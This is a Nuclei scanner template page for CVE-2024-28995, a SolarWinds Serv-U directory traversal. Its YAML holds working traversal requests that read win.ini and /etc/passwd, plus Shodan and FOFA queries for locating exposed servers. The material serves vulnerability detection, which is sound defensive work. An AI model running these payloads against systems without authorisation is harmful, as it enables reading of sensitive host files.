Skip to content
Nuclei Templates

SolarWinds Serv-U - Directory Traversal

ID: CVE-2024-28995

Severity: high

Author: DhiyaneshDK

Tags: cve,cve2024,lfi,solarwinds,serv-u,kev

Description

Section titled “Description”

SolarWinds Serv-U was susceptible to a directory transversal vulnerability that would allow access to read sensitive files on the host machine.

YAML Source

Section titled “YAML Source”
id: CVE-2024-28995


info:
  name: SolarWinds Serv-U - Directory Traversal
  author: DhiyaneshDK
  severity: high
  description: |
    SolarWinds Serv-U was susceptible to a directory transversal vulnerability that would allow access to read sensitive files on the host machine.
  reference:
    - https://attackerkb.com/topics/2k7UrkHyl3/cve-2024-28995/rapid7-analysis
    - https://nvd.nist.gov/vuln/detail/CVE-2024-28995
    - https://x.com/stephenfewer/status/1801191416741130575
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-28995
    cwe-id: CWE-22
    cpe: cpe:2.3:a:solarwinds:serv-u:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: solarwinds
    product: serv-u
    shodan-query: html:"Serv-U"
    fofa-query: server="Serv-U"
  tags: cve,cve2024,lfi,solarwinds,serv-u,kev


http:
  - raw:
      - |
        GET /?InternalDir=/../../../../windows&InternalFile=win.ini HTTP/1.1
        Host: {{Hostname}}


      - |
        GET /?InternalDir=\..\..\..\..\etc&InternalFile=passwd HTTP/1.1
        Host: {{Hostname}}


    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"
          - "\\[(font|extension|file)s\\]"
        condition: or


      - type: dsl
        dsl:
          - 'contains(header, "Serv-U")'
          - 'status_code == 200'
        condition: and
# digest: 4b0a0048304602210093bb4a826ec1336aa0fb0e5d4ff919da511fea66e409370f35d1fe1b255654c80221008f47005b181cab7f3b9e4b2a918ae33d73cd1df6f0f7eb90f73402a295865eb2:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-28995.yaml"

View on Github